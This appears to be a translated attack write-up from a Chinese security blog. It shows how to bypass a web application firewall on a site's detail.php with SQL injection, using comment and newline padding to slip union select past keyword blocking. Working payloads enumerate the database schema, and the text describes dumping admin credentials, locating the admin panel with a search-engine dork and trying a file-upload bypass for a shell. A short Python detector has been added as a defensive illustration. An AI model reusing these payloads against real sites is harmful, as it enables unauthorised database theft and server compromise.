0x01 Injection stage
/!order/ /!by/ 10-- -
Testing showed that inline comments could not get union select through: this site hard-blocks the union and select keywords.
Here it turned out that even commenting out union still got blocked.
This is genuinely troublesome; it hard-blocks these two keywords, which caused a lot of trouble for our injection. After some testing I worked out a way to get around this WAF's restriction.
payload:
detail.php?asdasdasdasd/*&id=10' and mod (35,12) union &asdasdas=1*/
detail.php?asdasdasdasd/*&id=10' and mod (35,12) union%23aasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdas%0aselect &asdasdas=1*/
detail.php?asdasdasdasd/*&id=.10' and mod (35,12) union%23aasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdas%0aselect 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- -&asdasdas=1*/
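As an added defensive example (not code from the original post), the check below shows why a request filter should decode each query parameter separately, the way the PHP backend does, and strip MySQL comments before keyword matching. The URL is constructed for this example and mirrors the shape of the payloads above with the padding shortened; the "raw scan" function is an assumed weak filter model, not the real WAF's logic.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample, same shape as the page's payload with shorter padding.
SAMPLE_URL = ("http://example.test/detail.php?asdasdasdasd/*"
              "&id=10' and mod (35,12) union%23aaaaaaaa%0aselect 1,2,3-- -"
              "&asdasdas=1*/")

# MySQL comment forms: /* ... */, '#' to end of line, '-- ' to end of line.
_COMMENTS = re.compile(r"/\*.*?\*/|#[^\n]*\n?|--\s[^\n]*\n?", re.S)
_UNION_SELECT = re.compile(r"\bunion\b.*?\bselect\b", re.I | re.S)


def normalise(value: str) -> str:
    """Strip MySQL comments from one decoded value and squeeze whitespace."""
    return " ".join(_COMMENTS.sub(" ", value).split())


def raw_scan_misses(url: str) -> bool:
    """Assumed weak model: scan the raw, still-encoded query string as one
    blob and treat /* ... */ as a comment. The /* in the first parameter
    name then swallows the whole id parameter, so nothing is flagged."""
    query = urlsplit(url).query
    return not _UNION_SELECT.search(_COMMENTS.sub(" ", query))


def flagged_params(url: str) -> dict:
    """Defensive check: split and percent-decode per parameter first (as
    the backend does), then strip comments, then look for union ... select.
    Returns {parameter name: normalised value} for every hit."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {name: normalise(v) for name, vals in params.items()
            for v in vals if _UNION_SELECT.search(normalise(v))}
```

Under the weak model the request passes untouched, while per-parameter decoding flags the id value as "10' and mod (35,12) union select 1,2,3".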
OK, next we continue with database() to get the current database.
detail.php?asdasdasdasd/*&id=.10' and mod (35,12) union%23aasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdas%0aselect 1,2,3,4,5,concat((select @rui from(select (@rui:=0x00),(select @rui from information_schema.columns where table_schema=database() and @rui in(@rui:=concat(@rui,table_name,0x2d2d3e,column_name,0x3c62723e))))rui)),7,8,9,10,11,12,13,14,15,16,17-- -&asdasdas=1*/
We have now found the table and columns holding the target back-end's account and password; next we simply dump the data.
A Google dork search revealed the target admin back-end; next we attempt to log in.
0x02 Getting a shell
Next we look for an upload point to get a shell on the target.
Here it was found that capturing the request in Burp and modifying the jpg extension allowed arbitrary upload; below we test this in practice.
After the upload succeeded, the PHP content turned out to be forcibly converted into an image. This looked of little use, so I did not dig deeper and went back to looking for other upload points.
Author: 潇湘信安
This article was published by a SecPulse (安全脉搏) column author; please credit the source when reprinting: https://www.secpulse.com/archives/187347.html